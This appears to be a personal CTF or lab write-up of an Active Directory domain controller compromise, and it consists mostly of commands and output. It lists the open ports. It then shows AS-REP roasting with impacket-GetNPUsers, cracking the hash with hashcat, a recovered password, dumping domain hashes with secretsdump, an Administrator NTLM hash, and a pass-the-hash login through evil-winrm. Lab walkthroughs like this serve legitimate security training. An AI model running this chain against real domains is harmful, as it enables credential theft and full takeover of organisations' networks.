machine ip : 172.31.3.6 my ip : 10.10.0.33 ### port informations ``` Open 172.31.3.6:53 Open 172.31.3.6:88 Open 172.31.3.6:135 Open 172.31.3.6:139 Open 172.31.3.6:389 Open 172.31.3.6:445 Open 172.31.3.6:464 Open 172.31.3.6:593 Open 172.31.3.6:636 Open 172.31.3.6:3268 Open 172.31.3.6:3269 Open 172.31.3.6:3389 Open 172.31.3.6:5985 Open 172.31.3.6:9389 Open 172.31.3.6:47001 Open 172.31.3.6:49665 Open 172.31.3.6:49664 Open 172.31.3.6:49666 Open 172.31.3.6:49669 Open 172.31.3.6:49668 Open 172.31.3.6:49670 Open 172.31.3.6:49673 Open 172.31.3.6:49674 Open 172.31.3.6:49691 Open 172.31.3.6:49699 ``` ![[Pasted image 20220109043818.png]] ldap ``` sync.csl SYNC sync.sync.csl ``` ### user ![[Pasted image 20220109043903.png]] ``` impacket-GetNPUsers -no-pass -dc-ip 172.31.3.6 sync.csl/ -usersfile users.txt ``` ![[Pasted image 20220109044342.png]] ``` hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt ``` manager : !!MILKSHAKE!! ``` impacket-secretsdump sync.csl/manager:'!!MILKSHAKE!!'@172.31.3.6 ``` ![[Pasted image 20220109044741.png]] ``` Administrator:500:aad3b435b51404eeaad3b435b51404ee:a72e3fae34d37ec6f82d7f2c3a72bc04::: evil-winrm -i 172.31.3.6 -u 'administrator' -H 'a72e3fae34d37ec6f82d7f2c3a72bc04' ``` ![[Pasted image 20220109044850.png]]